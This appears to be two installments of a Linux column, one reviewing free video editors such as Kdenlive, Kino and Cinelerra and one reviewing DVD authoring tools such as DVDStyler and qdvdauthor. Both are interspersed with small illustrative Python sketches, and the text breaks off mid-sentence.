The Grumpy Editor's video journey part 2: Video editors


In the first installment in this
series, your editor took on the task of getting video data onto his
system in digital form.  Part 3 talked about
authoring DVDs with the nicely edited versions of those video clips.  Now
it's time to fill in the missing second part, wherein your editor turns raw
captured video into something suitable for DVD creation.


The task to be accomplished is relatively simple: for each video clip, trim
off the extra junk at the beginning and the end.  Some of them also require
internal editing; there were signs of operator error in the form of, say,
extended sequences where the sole subject matter was the floor and,
perhaps, the cinematographer's shoe.  Nice transitions between the clips
were desired - a basic fade to black at the end, if nothing else.  The
addition of titles is useful.  And, as an added bonus, the video clips
needed to be deinterlaced before being written in a form suitable for
passing to the dvdauthor utility.


In the process, your editor encountered several tools in varying states of
readiness.  He has become better acquainted than ever with the notion of
"build hell."  A rather more than passing acquaintance with the behavior of
the out-of-memory killer in 2.6.24-rc kernels has also been achieved.  And,
at the end, your editor believes he has a reasonable sense of the state of
the art in Linux video editing.

Avidemux


Avidemux is a GTK-based
editor which, according to its web page, is "designed for simple cutting,
filtering and encoding tasks."  It is an interesting combination of
simplicity in some areas combined with great power and complexity in
others.  It has a lot of potential, but it also has a few rough edges.


For example, Avidemux handles DVD-style MPEG2 files without trouble.  But a
reader who digs far enough into the documentation (which is extensive and
useful, incidentally) finds a warning that one must exercise the "build VBR
time map" option, or audio and video will become unsynchronized in the
final product.  This operation is nearly instantaneous on a five-minute
clip; given the problems which can result from not doing it, why does
Avidemux not just build this "time map" when the file is loaded?  Why set a
trap like that for your users?


The actual video editing operations are quite simple.  Avidemux can only
handle a single video clip, and that clip has a single set of begin/end
points.  It is possible to delete from the middle of a clip using those
endpoints; deletion is instantaneous and leaves no sign on the timeline.
There is no "undo" operation, but there is an option to dump all
changes made to the file.
There is a scrollbar which enables quick movement through the clip; the
arrow keys move by single frames.  In general, the interface is responsive
on your editor's machine.


One place where Avidemux excels is in its selection of video filters.
For example, your editor went looking for a filter to deinterlace the
video; he found 21 different deinterlacing filters.  Many of these filters
have an extensive set of configuration options.  Actually choosing the
right filter and options for the task at hand is an intimidating task, and
the documentation does not provide a whole lot of guidance.  In the end,
your editor got reasonable results with the "yadif" filter, as can be seen
in the "before" and "after" images on the left.
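For readers wondering what the simplest of these filters actually does,
here is a minimal sketch of a linear-interpolation deinterlacer.  It is not
yadif, which is considerably more sophisticated and also looks at
neighboring frames; it just keeps the even-numbered lines of a frame and
rebuilds each odd line by averaging the lines above and below it.  The frame
representation (a list of rows of brightness values) and the function name
are assumptions made purely for illustration.

```python
def deinterlace_linear(frame):
    """Keep even rows; rebuild each odd row from its vertical neighbors.

    `frame` is a list of rows, each row a list of integer pixel values.
    This is a hypothetical, simplified stand-in for a real filter.
    """
    height = len(frame)
    out = [list(row) for row in frame]
    for y in range(1, height, 2):
        above = frame[y - 1]
        # The last row may have no row below it; fall back to the one above.
        below = frame[y + 1] if y + 1 < height else above
        out[y] = [(a + b) // 2 for a, b in zip(above, below)]
    return out
```

Throwing away half of the lines costs vertical resolution, which is one
reason why the more elaborate filters exist.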


A fade-to-black ending was achieved with another filter.  It works
beautifully, if one does not mind that (1) there is no choice of what
to fade to beyond a "fade to black" toggle, (2) the portion of
the clip to be affected must be identified by typing in frame numbers, and
(3) those frame numbers are not adjusted should somebody, say, delete
some video from an earlier part in the clip.  The capability is there, but
the interface needs some work.
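The third complaint is the sort of bookkeeping an editor could do on the
user's behalf.  As a sketch only (this is not Avidemux code, and the
function name and the inclusive frame-range convention are assumptions),
the adjustment of an effect's frame range after a deletion might look like
this:

```python
def shift_range_after_delete(start, end, del_start, del_end):
    """Return the new (start, end) of an effect after frames
    del_start..del_end (inclusive) are deleted from the clip.

    Returns None if the whole effect range was deleted.
    Hypothetical helper; frame numbers are inclusive on both ends.
    """
    removed = del_end - del_start + 1
    if del_start <= start and end <= del_end:
        return None  # the entire effect range was cut away

    if start < del_start:
        new_start = start              # before the cut: unchanged
    elif start > del_end:
        new_start = start - removed    # after the cut: slides earlier
    else:
        new_start = del_start          # first surviving frame after the cut

    if end < del_start:
        new_end = end
    elif end > del_end:
        new_end = end - removed
    else:
        new_end = del_start - 1        # last surviving frame before the cut

    return new_start, new_end
```

With a fade covering frames 9000 through 9059, deleting frames 1000 through
1999 earlier in the clip would move the fade to 8000 through 8059.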


Other filters allow cropping, mirroring, color modifications, noise
removal, sharpening, blurring, addition of subtitles, the addition of logos
from image files, the creation of animated DVD menus, etc.  Should all of
those be inadequate, the "swiss army knife" filter is there for more
general low-level processing.  There is also a scripting interface for
Avidemux, though your editor did not attempt to make use of it.


The interface allows the user to view the video either before or after the
filters have been applied - or both together.  The latter mode tends to run
slowly, though the post-filter output, by itself, worked just fine.


In the end, saving the file out as a DVD "video object" does the job -
though one has to assume that the rather spartan "save" dialog will do
that.  Like most (but not all) video editors, Avidemux does not actually
change the video data until told to render a new file.  The list of edits,
filters, etc. can be saved as a "project" file (an Avidemux script, really)
so an editing session can be resumed at a future point using the original
material. 


The bottom line is that Avidemux is a capable and reasonably solid tool -
your editor was not able to make it crash.  Its long list of filters will
be appealing to some users.  Its inability to work with more than one clip
at a time will rule it out for many others, though.  Like so many other
tools in this category, it's almost there.

Cinelerra


The Cinelerra tool has an interesting history.  It was once known as
"Broadcast 2000," before being withdrawn because somebody was worried about
legal liability.  Now it is available as "Cinelerra," but in two versions.
The "official"
version is published by a company named Heroine Warrior, which has no
real interest in the hassles of dealing with a community or making regular
releases.  Heroine Warrior is, however, generous enough to make the code
available under the GPL; a group of developers has taken the code and made
Cinelerra CV - the "community
version."  This version is supposed to be under active development and move
more quickly, but it still doesn't seem to be moving all that fast,
unfortunately. 


There are some good documents for Cinelerra, but, reading them, one starts
to encounter certain themes.  For example:


	Cinelerra is not perfect. Before long you will be familiar with
	the tendency it has to crash


Or this one:


	Quicktime is not the standard for UNIX but we use it because it's
	well documented. All of the Quicktime movies on the internet are
	compressed. Cinelerra doesn't support most compressed Quicktime
	movies but does support some. If it crashes when loading a
	Quicktime movie, that means the format probably wasn't supported. 


Cinelerra is by far the most complex - and capable - of the tools available
for Linux.  If you are looking for an editor designed for the creation of
complicated video with lots of effects, Cinelerra is the tool for you.
Unfortunately, Cinelerra does not appear to have a development community
which is up to the maintenance of a tool of this size.  So it is difficult
to work with and not particularly robust.


At startup, Cinelerra puts up four individual windows.  The "timeline"
shows all of the tracks being edited, and is the place where much work
actually gets done.  There are two video windows; one displays the current
state of the timeline, while the other can be used to look at individual
clips outside of the timeline.  Then the "resources" window holds
everything else.


The timeline display is quite nice.  Video thumbnails along the line give a
rough sense of what is happening in each clip.  The display of audio levels
is also highly useful when one is trying to find specific events; it would
be nice if other tools picked up this idea.  A number
of editing operations can be performed directly on the timeline; each
track, for example, has a horizontal line which can be manipulated to
adjust the (audio or video) levels at any given point.  So a fade-to-black,
for example, is a simple matter of ramping the video level down at the
right place.  
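The ramp described above amounts to scaling each frame by a gain which
falls linearly from 1 to 0.  A minimal sketch, assuming frames are numbered
along the timeline and pixels are plain brightness values; the function
names are hypothetical and this is not how Cinelerra itself is implemented:

```python
def fade_gain(frame, fade_start, fade_end):
    """Video level for `frame`: 1.0 up to fade_start, 0.0 from fade_end on,
    and a straight line in between."""
    if frame <= fade_start:
        return 1.0
    if frame >= fade_end:
        return 0.0
    return (fade_end - frame) / (fade_end - fade_start)


def apply_gain(pixels, gain):
    """Scale a list of brightness values by `gain`."""
    return [round(p * gain) for p in pixels]
```

A one-second fade on NTSC material would cover roughly 30 frames, so
fade_end would sit about 30 frames after fade_start.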


For more complex operations, there is a large list of effects which can be
applied.  These effects show up on the timeline next to the tracks they
operate on; their end points can easily be dragged around.  Cinelerra will
attempt to render effects when the timeline is being played, but that tends
to slow the program (not the fastest tool to begin with) to a point where
it cannot keep up with normal video rates.


Cinelerra does not modify any data until told to render the project.  It
cannot create DVD video objects directly; one must render audio and video
separately, then multiplex them outside of the program.  The edit list can
be saved separately.


There is a whole host of features in Cinelerra not found anywhere else.
For example, it can be used to drive a rendering farm for those big
production jobs.  There is a motion tracking subsystem built into it
("The intricacies of motion tracking are enough to sustain entire
companies and build careers around").  There's a set of options
for audio and video capture.  And so on.


But your editor could never get all that far with Cinelerra before it ran
the system out of memory.  One does, indeed, become familiar with its
tendency to crash, but it's especially annoying when it takes the rest of
the system down with it.  Cinelerra should really be one of the star
applications in the free software world.  It has a great deal of power and
can do amazing things; it could be a professional-quality tool.  What it
needs is for the community to truly take 
charge of the "community version" and turn it into a system which is fast,
robust, and easier to use.  To that end, it would help if the two people on
the planet who can succeed in actually building this system would clean up
that process and, in general, make Cinelerra more welcoming to new
developers.  The foundation for a great video editor is here, but there is
a lot of finishing work to be done.

Kdenlive


Kdenlive is a KDE-based editor under
active development; version 0.5 was released in August, 2007.  Having not
found a version for Rawhide, your editor set out to build this tool, only
to give up in despair.  So, as an aside, your editor would like to offer a
helpful suggestion to developers who want people to actually use their
code: if you absolutely must use your own build tool instead of
make, and there is just no alternative to using a tool which
nobody has heard of or packages and which does not have a web site or
working download location, please consider just packaging said tool with
your code.  Your editor is sure that "unsermake" is vastly superior to the
alternatives which we all have on our systems already, but it doesn't help
if you can't find it.

Of course, even after solving that problem, your editor was not able to
build this tool.  Fortunately, Ubuntu ships it, so that is the version
which was used here.

The initial Kdenlive experience is a little rough; it asks for a set of
default parameters.  How is one to choose between, say, "CIF NTSC" or "DV
NTSC" or "DV NTSC Widescreen"?  There is no help on offer to guide the user
toward the right choice.  Once past that, the user sees a window with three
major panes which offer functionality similar to that available from
Cinelerra.

The first step is to bring one or more video clips into the "project tree,"
which is (usually) visible in the upper left pane.  These clips can be
viewed in the "clip monitor" on the right.  A clip of interest can then be
dragged down to the timeline area, where it can be easily positioned
relative to any others which are already there.

Kdenlive uses the "divide and conquer" editing method.  To remove a section
of a clip, the user positions to one end of that section, then selects
"razor" to split the clip in two at that point.  Another split at the other
end isolates the section to be removed, which can then be deleted with a
separate operation.  There is (with the exception of transitions) no way to
apply an operation to a part of a clip - the area of interest must always
be razored out first.
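The razor model is easy to picture as a list of segments, each pointing
into a source file.  The following is a sketch under that assumption; the
Segment type and the razor() function are invented for illustration and say
nothing about how Kdenlive stores its timeline internally.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    source: str
    first: int  # first source frame, inclusive
    last: int   # last source frame, inclusive


def razor(segments, position):
    """Split whichever segment covers timeline frame `position` so that a
    new segment begins exactly at `position`."""
    result = []
    offset = 0  # timeline frame at which the current segment starts
    for seg in segments:
        length = seg.last - seg.first + 1
        if offset < position < offset + length:
            cut = seg.first + (position - offset)
            result.append(Segment(seg.source, seg.first, cut - 1))
            result.append(Segment(seg.source, cut, seg.last))
        else:
            result.append(seg)  # position is outside or on a boundary
        offset += length
    return result


# Remove frames 300..449 from a 1000-frame clip: two cuts, one delete.
timeline = [Segment("clip.mpg", 0, 999)]
timeline = razor(timeline, 300)
timeline = razor(timeline, 450)
del timeline[1]
```

Nothing is copied or re-encoded here; the source file is untouched and only
the list of references changes, which is why such edits can be instant.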

As a result, the fade-to-black effect is not quite as easily achieved in
Kdenlive as with some other tools.  There is a "brightness" effect, but it
changes the brightness to a constant value through the entire clip.  The
way to fade out a scene is to add a new clip with a solid color (easily
done in Kdenlive), then use a crossfade transition to join the two clips
together.

Transitions are added by selecting the first track and, via the
right-button menu, selecting the desired transition.  Various parameters
(such as the time required for the transition) can then be tweaked.  It all
works easily; Kdenlive is a fun tool for quickly piecing together different
bits of video into a coherent whole.

There are separate video windows for displaying individual clips and the
timeline as a whole; by default, they cannot both be viewed at the same
time. Playback is responsive.  It's a little more awkward than with some
tools, though: the position cursor is small and hard to grab, and there is
a shortage of keyboard shortcuts for moving around.  The timeline is less
informative and less functional than Cinelerra's, but the information one
really needs is there.  


When the project is done, there is a nice "export to DVD" option to
do the rest of the work.  Kdenlive can create the video object files and
fire up Qdvdauthor to do the rest, or it can create a
basic, single-title DVD internally and (using k3b) burn it to a disc.  Your
editor, thus, should have 
mentioned Kdenlive in the DVD authoring article, but he was unaware of this
feature at that time.  It all works easily; your editor was able to make a
playable DVD with minimal trouble.

It was not the most beautiful DVD, though, because Kdenlive has no
deinterlacing capability.  Those of us unlucky enough to be starting with
interlaced video must handle that operation separately, before or after the
editing process.


While any of the editors discussed here could conceivably work with
high-definition video, Kdenlive is the only one which appears to have been
written with that in mind.  Projects can be set up in HD formats without
undue tweaking.  Your editor was not in a position to test this capability,
though.

All told, Kdenlive comes across as one of the most finished of the free
editing tools.  It is relatively straightforward to use and it has all of
the features that most people are likely to need.  For many applications,
this could well be the first tool to reach for.

Kino


Despite its "K" name, Kino is a GTK-based
video editor.  It is quick and easy to use, but also lacking somewhat in
power.


Kino only works with a single video format - the digital video (DV) format
associated with contemporary camcorders.  When started with something else
(say, your editor's MPEG files from the capture card), it will offer to
convert the file into DV.  This process works, but the result is a
significant (5-10x) increase in the size of the file.
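The size increase follows from the bit rates involved.  As a
back-of-the-envelope sketch: a DV stream runs at a fixed rate of roughly
3.6MB/second (video plus audio), while the 4Mbit/second figure used below
for the MPEG2 capture is purely an assumption; the article does not say
what rate the capture card was set to.

```python
DV_KBITS_PER_SEC = 28_800     # roughly 3.6 MB/s for DV video plus audio
MPEG2_KBITS_PER_SEC = 4_000   # assumed capture bit rate, not from the article


def size_bytes(kbits_per_sec, seconds):
    """Approximate file size for a constant-bit-rate stream."""
    return kbits_per_sec * 1000 * seconds // 8


clip_seconds = 5 * 60
mpeg_size = size_bytes(MPEG2_KBITS_PER_SEC, clip_seconds)
dv_size = size_bytes(DV_KBITS_PER_SEC, clip_seconds)
growth = dv_size / mpeg_size
```

Under those assumptions a five-minute clip grows from about 150MB to a bit
over 1GB; a lower capture bit rate pushes the ratio higher.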


There is no timeline in Kino; instead, it has a "storyboard" in the
leftmost pane.  Each video clip becomes a separate scene in the storyboard,
with each being played strictly before the one after it.  Like Kdenlive,
Kino works by dividing clips and applying operations to the pieces.  So
trimming video is done by "splitting" the scene into wanted and unwanted
parts, then deleting the latter.  The documents make much of the "powerful"
three-point trim feature, but your editor doesn't get it; it just seems
like a way to set the beginning and ending split points on the same screen,
but the amount of work remains the same.


Moving within clips is quick and easy in Kino.  There is also a
scrollbar-based "jog wheel" for variable-speed motion in either direction.
What your editor really likes, though, are the keyboard shortcuts,
including vi-style bindings for moving, frame-by-frame, through the
material.  It makes finding the exact spot to make a cut a quick affair. 


Kino offers a reasonable set of effects, though the interface and
implementation are awkward.  Most effects apply to a full scene, so the
normal mode of operation is to split scenes where an effect is to be
placed.  There is an option to "limit" an effect to a period of time at the
beginning or end of a scene, though, so something like fade-to-black or a
crossfade can be done without making new scenes.


Or so one would think.  Unlike most other editors, Kino does not apply
effects at playback time; instead, an effect must be rendered when it is
applied to the scene.  The result is a new scene (even if the limit option
described above is used) backed by a new DV file created by the effect
renderer.  For good measure, the rendering code places the
rendered file (with a name like 001.kinofx.dv) in the user's home
directory, which can quickly become cluttered with them.  This approach
lets Kino display effects without performance problems, but it is a bit
messy and inelegant.


While Kino only works with DV files, it has one of the nicest export
dialogs around.  There is a long list of options, one of which is DVD-style
MPEG.  There's even a "deinterlace" pulldown with a few options.  The
internal deinterlacer is, as advertised in the menu, very fast, but the
results are not all that great.  If one, instead, has Kino use the external
YUV deinterlacer, things will be exceedingly slow, but the results are
worth it.  Examples from both deinterlacers can be seen on the left.


By default, the DVD exporter creates the necessary video object file and a
simple dvdauthor script for a minimal DVD.  There are options, though, to
burn the DVD immediately or to go into Qdvdauthor for further work.


One might mention that, like most of the other tools discussed here,
Kino does not play nicely with others when it comes to the audio
subsystem.  Each tool has its own way of responding to contention, though.
In this case, if Kino is unable to get exclusive access to the audio
device, it shows its displeasure by playing video (silently, of course) at
ten times the normal speed.  After a while one learns to recognize this
particular tantrum, but it still would be nicer if the application would
say something like "I'm not willing to share the audio device, can you
please stop your music player if you want to play back your video?"


Bottom line: Kino is a reasonably capable editor which, after a very short
learning period, is quick and fun to use.  It may well be the best option
for people with relatively simple needs.  Those wanting more sophisticated
capabilities, though, are likely to see it as an underpowered toy.

LiVES


The Linux Video Editing System
(LiVES) is a relatively simple editor with some interesting capabilities.
The web page claims:


	LiVES is good enough to be used as a VJ tool for professional
	performances, and as a video editor is capable of creating dazzling
	clips in a wide variety of formats. 


Your editor, however, is not a VJ.  So his experience with this tool was
not the best.

The process of importing a video clip into LiVES is slow and
disk-intensive.  After some investigation, your editor figured out why:
LiVES works by converting every video frame into a separate JPEG image
file.  The end result is a directory containing tens of thousands of images
and a massive expansion in the size of the clip.  It also cannot be good
for system performance in general; your editor can only suggest that using
a filesystem with indexed directories would be a good idea.

LiVES is one of those applications with such a sense of its own importance
that it comes up maximized from the outset.  The interface reconfigures
itself on the fly depending on what operations are selected - in
particular, video display windows come and go in a frequent and distracting
manner.  The default directory for video files is /usr/local.
Cross-fading one clip into another works, but it loses the 
synchronization with the audio.  Many tasks are done by running external
programs; should that program fail, LiVES will tell the user, but it does
not pass on the information provided by that program.  So figuring out
why things fail is a matter of digging through debug and
strace output.


Somewhere in this process, your editor decided that, while LiVES may indeed
make VJs happy, it is not a serious editing tool for the rest of us.  There
is the potential for some nice features there, but this application needs a
lot of work before it will be ready for general use.


PiTiVi


One gets used to thinking of video editors as being huge programs written
in relatively fast languages.  PiTiVi, however, is an
exception to the rule: it's a smallish application written in Python.  Of
course, it's only small when one overlooks some of the external pieces -
like gstreamer.

This application, too, was a bit of a challenge to get going.  It has
various dependencies not accounted for in its configure script, including
some strange ones: why does a video editor need to import Zope modules?
Still, your editor had better luck here than with some of the alternatives.


The good news is that, despite its Python implementation, PiTiVi is
responsive when moving around in video clips.  On the other hand, moving
around in clips is really about all that PiTiVi can do at this point.
There is a rudimentary timeline display which does not do anything, and no
editing options are available.  So PiTiVi, while being a promising start,
is not really an editor at this time.


Conclusion

Worth mentioning in passing: the Open Movie
Editor looks like a tool with some promise.  It disliked your editor's
video files, though, claiming that it only supports files with a 25
frames/second rate.  Your editor, deep in NTSC country, has no such files.
Hopefully, as this project matures, it will achieve the generality this
kind of tool must have.


The free software community can be aggravating sometimes.  We clearly have
the ability and the desire to create top-quality tools for tasks like video
editing.  But what we get is a half dozen tools, none of which is a
complete solution to the problem.  Your editor would be the first to say
that competition between projects can be a good thing, inspiring everybody
involved to push harder and achieve more.  But, still, maybe having fewer
competing tools might just help people to work together and make tools
which are truly great.


That said, the state of the art in Linux video editing is not as bad as one
might think.  The tools are there to put together a decent video without a
great deal of trouble.  As mentioned above, Kdenlive is arguably the most
polished of these tools, with Kino also being a good candidate for simpler
applications.  And Cinelerra remains in its position as the application
that is going to be truly spectacular, once all of those loose ends finally
get tied up.


Your editor once heard Lawrence Lessig say that text is like Latin for
younger people today, and that video is the preferred way to communicate.
If that is true, then we want to make it possible to communicate as richly
as possible while using free tools.  We have a good base to build on, and
many smart people have solved many of the hardest problems.  Finishing the
job is well within our capabilities.

The Grumpy Editor's video journey part 3: DVD authoring


As readers of the first part of
this series will remember, your editor has set out on a project to
digitize a set of old video tapes and turn them into properly-formatted DVD
media suitable for handing out to the grandparents.  Part 1 was about the
task of capturing this data to disk; part 2 covers the video editors available
for turning the captured data into something watchable, and part 3
covers the task of creating a DVD from the edited video.  


Attentive readers may have noticed that part 2 has not yet been
written; there are more editors available than your editor had expected
(currently under review are Cinelerra
CV, Kino, PiTiVi, LiVES, and Avidemux), so that process is
taking longer than expected.  For the purposes of this article, let us
assume that your editor has a disk full of video clips which have been
edited and properly formatted into the MPEG2/AC3 video object files expected
by DVD players.  There will be a discussion of the best ways to get those
files there in the near future, promise.


Many of us have burned CDs and found the process to be relatively
straightforward - the biggest obstacle is often just getting past the
grumpiness built into cdrecord and its latter-day derivatives.  Creating
data DVDs is not a whole lot harder.  So one might be inclined to approach
the task of creating a video DVD with a "this will be easy" attitude.  It
is, in fact, a task just about anybody can learn to do, but it is on a
different order of complexity than creating a CD full of music.  A video
DVD is, in truth, a program complete with its own hierarchical structure,
menus, and code written for the simple virtual machine lurking within every
DVD player.  Creating a playable DVD requires writing that program.


If DVDs are programs, then the one compiler available for Linux systems is
the command-line dvdauthor
tool.  Regardless of how one builds a DVD, dvdauthor will be involved in
the process at some point.  This tool requires a collection of video
objects representing the actual video titles and also implementing the
menus, subtitles, and more.  It's all tied together via a complex XML file
which is compiled by dvdauthor to create the final product.
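For a sense of what the simplest possible control file looks like, here is
a sketch which generates one for a menu-less DVD, with each video object
becoming its own title.  The element names (dvdauthor, vmgm, titleset,
titles, pgc, vob) are those of dvdauthor's XML format; the function name,
the file names and the "dvd" output directory are assumptions made for
illustration.

```python
import xml.etree.ElementTree as ET


def build_dvdauthor_xml(vob_files, dest="dvd"):
    """Return a minimal dvdauthor control file as a string.

    Each entry in `vob_files` becomes one title; no menus are defined.
    """
    root = ET.Element("dvdauthor", dest=dest)
    ET.SubElement(root, "vmgm")  # empty top-level menu set
    titleset = ET.SubElement(root, "titleset")
    titles = ET.SubElement(titleset, "titles")
    for path in vob_files:
        pgc = ET.SubElement(titles, "pgc")  # one program chain per title
        ET.SubElement(pgc, "vob", file=path)
    return ET.tostring(root, encoding="unicode")


control = build_dvdauthor_xml(["clip1.vob", "clip2.vob"])
```

Saved to a file, the result would be handed to the tool with "dvdauthor -x
dvd.xml".  Everything that makes a real DVD pleasant to use, menus and
buttons in particular, is what inflates this file to the point where the
graphical tools become attractive.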


It is possible to create all of these pieces by hand, and, doubtless, Real
Linux Video Jocks would not do it any other way.  One can use dvdauthor to
help with the generation of parts of the XML file.  There is documentation
which seems fairly complete, if a bit terse.  But the fact of the matter is
that most people attempting to use this tool directly will give up in
despair.  There is no reason why DVD authors should have to work at this
level; dvdauthor is essentially an assembler which, while being absolutely
essential to do most of the heavy lifting, should be hidden from most
polite company.  DVD creation is a visual task; there should be
visually-oriented tools for this job.  The good news is that these tools
do, indeed, exist.

DVDStyler


The first of these tools is DVDStyler, a GTK-based application.
There are three basic tabs which are used to work through the tasks of
piecing together a DVD; they are labeled "Directories," "Backgrounds," and
"Buttons."  The directories tab pulls up a simple internal directory
browser, useful for adding objects to the DVD.  So, if the DVD author has a
collection of VOB files containing video data, they can be found by way of
this tab and added, one by one, to the DVD.  Each object shows up in the
bottom pane of the window, generally with an unhelpful annotation like
"Title 2".  There is no easy way to see what each of those titles is;
one must query their properties and look at the associated file name.

As a grumpy aside, your editor must note that the directory browser
uselessly starts at $HOME.  One need not work with much video data
before realizing that special provisions must be made for its storage;
video objects are unlikely to be kept in the home directory.  Your editor
has a hard time understanding why tools like this are unable to start file
searches in the current working directory, which is a much more likely
place to find things of interest.  Switching to $HOME is not just
a least-surprise violation; it actively makes things harder for the user.

The "Backgrounds" tab helpfully offers a dozen or so canned background
images which can be used for the DVD menus.  They are nice backgrounds, and
they might just be useful for somebody struggling through the process of
creating a DVD for the first time.  Your editor, though, suspects that most
users, by the time they create their second (working) DVD, might just want
to supply their own background images.  They will look for that option
under the "Backgrounds" tab in vain, though.  It is possible to
supply a custom image: go to the large (video screen) pane, right-click,
select "properties," and set an image there.  It's easy, once you've
figured it out.  But one would think that, having gone to the trouble to
provide an entire mode dedicated to background images, the developer would
have thought to toss in a "none of the above" button.


The hardest part of creating a DVD (once one has suitable video in place,
obviously) is getting the menus to work.  DVDStyler starts with an empty
main menu in place; it is up to the user to add entries which will do
interesting things.  That is done by way of the "Buttons" tab.  There's a
selection of arrows available, as well as the ability to add basic text
buttons.  The button of interest can be simply dragged to the right spot on
the menu, sized appropriately, and configured to do the right thing.  There
are also "empty" buttons for more complicated situations where the real
button text (or image) is found on the menu's background image.


Having added a button, the author must tell the system what happens in
response to events on that button.  To that end, there is a separate
"properties" dialog.  Usually one wants a button to cause a certain video
title to be played, and that is easily configured.  If more than one menu
has been created, buttons can also be set to jump from one menu to the
next.  There is a "custom" blank for the harder cases which require direct
entry of code to be executed by the DVD virtual machine.  In DVDStyler, the
selection of relatively obscure options (subtitles, languages, camera
angles) can only be set up in this way.


Also required is a specification of what happens when one of the
directional arrows is pressed.  The default "auto" setting leaves that up
to the player, which will probably do the right thing - the down arrow, for
example, will move the focus to the next button below the current one.
Anybody who is concerned about the user interface provided by the resulting
DVD will probably want to set these actions explicitly, though - a somewhat
tedious and time-consuming task.


Eventually, the time comes to actually create the DVD.  Most first-time
users will probably go to the DVD menu for this task, but the "burn" option
is not there - it's under the "file" menu instead.  The resulting dialog
works nicely, giving the user the option to stop after generating the ISO
image or to run a preview application (xine by default) before actually
writing to the disk.  Underneath this dialog is a whole set of helper
commands which are run; those can be configured if need be, but most users
will not tread there.


All told, your editor found DVDStyler to be the easier tool to use for
quickly putting together a video disk.  There is just one little problem:
those disks never quite worked right on your editor's ancient DVD player.
Somehow, a misunderstanding about how the menus should work crept in.
Your editor suspects, perhaps, that overlapping buttons may have something
to do with it; the other application reviewed by your editor (QDVDAuthor)
detected and corrected that situation, but DVDStyler did not.  In any case,
newer players had no problem with the generated disks, so this may not be a
problem that most people need to be concerned with.
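If overlapping buttons are indeed the culprit (which is only a suspicion),
the check itself is not hard.  The sketch below treats each button as a
rectangle and reports every pair which intersects; the names and the
(x0, y0, x1, y1) layout are hypothetical, and nothing here is taken from
either application's code.

```python
from itertools import combinations


def overlaps(a, b):
    """True if rectangles a and b intersect.

    Each rectangle is (x0, y0, x1, y1), with x1 and y1 exclusive.
    """
    return a[0] < b[2] and b[0] < a[2] and a[1] < b[3] and b[1] < a[3]


def overlapping_pairs(buttons):
    """Return the names of every pair of buttons whose rectangles overlap.

    `buttons` maps a button name to its rectangle.
    """
    return [
        (name1, name2)
        for (name1, rect1), (name2, rect2) in combinations(buttons.items(), 2)
        if overlaps(rect1, rect2)
    ]


menu = {
    "play": (100, 100, 300, 150),
    "extras": (100, 140, 300, 190),  # starts 10 pixels too high
    "quit": (100, 200, 300, 250),
}
problems = overlapping_pairs(menu)
```

An authoring tool could run a check like this before generating the menu
and either warn the user or nudge the offending buttons apart.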

'Q' DVD-Author

 
The other DVD authoring application considered here is 'Q' DVD-Author (or qdvdauthor
from here on out in an effort to save your editor's typing fingers).  This
is a Qt-based application aimed at providing complete DVD authoring
capability.  It is arguably more complete and mature than DVDStyler, but
more complex as well.


Qdvdauthor provides a three-paned window with areas for the current set of
audio/video objects, the DVD hierarchy, and the menu designer.  The
audio/video pane, on the left end, is clearly a work in progress.  There is
a thumbnail area which shows the opening frame of the associated video -
sometimes.  Other times it stays green and qdvdauthor silently leaves an
mplayer process desperately cranking away in the background.  It was only
when the load average on your editor's system got to around 20 that he
figured that one out.  There is a "play" button which pops up a cheery "not
yet implemented" message.  The run time of each video title is also displayed.
All told, it is a more useful display than what DVDStyler offers, with the
potential to be quite a bit better yet.


The middle pane shows the current hierarchy of objects making up the DVD.
It is a helpful display, given that DVDs truly are hierarchical objects.
It likes to reset itself to the top, though, making it necessary to scroll
repeatedly toward the bottom when the DVD gets more complex.  The right
pane shows one of the DVD menus - or a couple of other things we'll see
later on.  One very nice feature is the little display at the bottom
showing how much data has been committed to the DVD so far and how much
room remains.


Video titles are easily added using the prominent "add movie" button.  Once
attention turns to the menu creation process, one notices that there is no
separate "backgrounds" tab - but there is a button for adding a custom
background image, which is what is really needed anyway.  Your editor found
that dragging a thumbnail from the video pane over to the menu area created
a picture button which would play the associated title - a nice feature.


The creation of text buttons (or those from a separate image) is a bit more
labor-intensive, requiring the user to right-click on the background,
select "add text", draw a rectangle to define the text area, fill in
a rather gaudy text dialog (shown left) with the actual text (and tweak
fonts and such), right-click on the newly-added text and select "define as
button", then fill in the button properties dialog (shown right).  That
last step involves setting the button name (necessary - it would be nice if
it defaulted to the button text) and picking the various associated actions.
It takes a while.


Eventually, the time comes to commit all of that work to an actual DVD.  A
click on the associated button gets that process going.  If one has been
sloppy in drawing out buttons, the first thing to come up will be a warning
that some of the buttons overlap, accompanied by an offer to fix the
problem automatically.  One can also decline the offer (aborting the
process) to fix the problem manually.


This is as good a point as any to note that moving and resizing buttons in
qdvdauthor is a real exercise in pain.  The button areas have the usual
grab points for moving, dragging edges and corners, or rotating the
button.  But none of those are visible until the user has clicked the mouse
and committed himself to doing something.  The end result is that attempts
to drag a button often do something else - like rotating it to some
strange angle.  The basic interaction modes for operating on graphical
objects in a display have been well understood for years; one can only
imagine that whoever designed this interface was engaging in some sort of
sadistic exercise which was sponsored by purveyors of
strong drink.


Once the buttons have been sorted out, selecting the burn operation brings
up a rather intimidating dialog showing all of the commands which will be
executed to get the job done.  It's at this point that one realizes just
how much behind-the-scenes magic is going on to make the DVD creation
process actually happen.  There are options to disable specific parts of
the process (actually burning the disk, for example), and the adventurous
can edit the commands before they run.  Most people, though, will probably
just hit the "OK" button at the bottom and watch the process unfold.  Which
it does, just as one would expect.


There are a few other nice features hidden in this application.  The menu
pane can be made to show the XML file which will be generated for
dvdauthor; it can also be put into a garish and complex dialog which
facilitates the addition of subtitles.  There is a template mechanism for
menus, and a network-based repository from which qdvdauthor can download
new templates.  There is an operation which will convert the entire DVD
between the NTSC and PAL formats - your editor has not yet exercised this
option, but, given that some of the grandparents for whom this work is
intended live in Europe, it will eventually come in handy.  There is a
little-used plugin mechanism and a theme feature as well; long-neglected
Motif users will be glad to know there is a style for them.  The addition
of audio to menus and intro/outro sequences to titles is relatively
straightforward.  There is also an option to make DVD slideshows out of a
series of still images.

Conclusion


Either one of these applications can get the job done.  They both show the
best of how an application on a Unix-like system can add power by using
existing tools.  Neither DVDStyler nor qdvdauthor actually does much of the
work of creating menus or burning DVDs; they mostly just put together
fiendishly-complex command lines and call out to the tools which have been
designed to do that work well.  Overall, the combination works reasonably
well.
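
As a rough illustration of the kind of input these front ends hand to the
underlying tools, the sketch below builds a minimal control file for a
menu-less, single-title disk.  The element names are believed to follow
dvdauthor's XML format; the helper build_dvdauthor_xml() and the names
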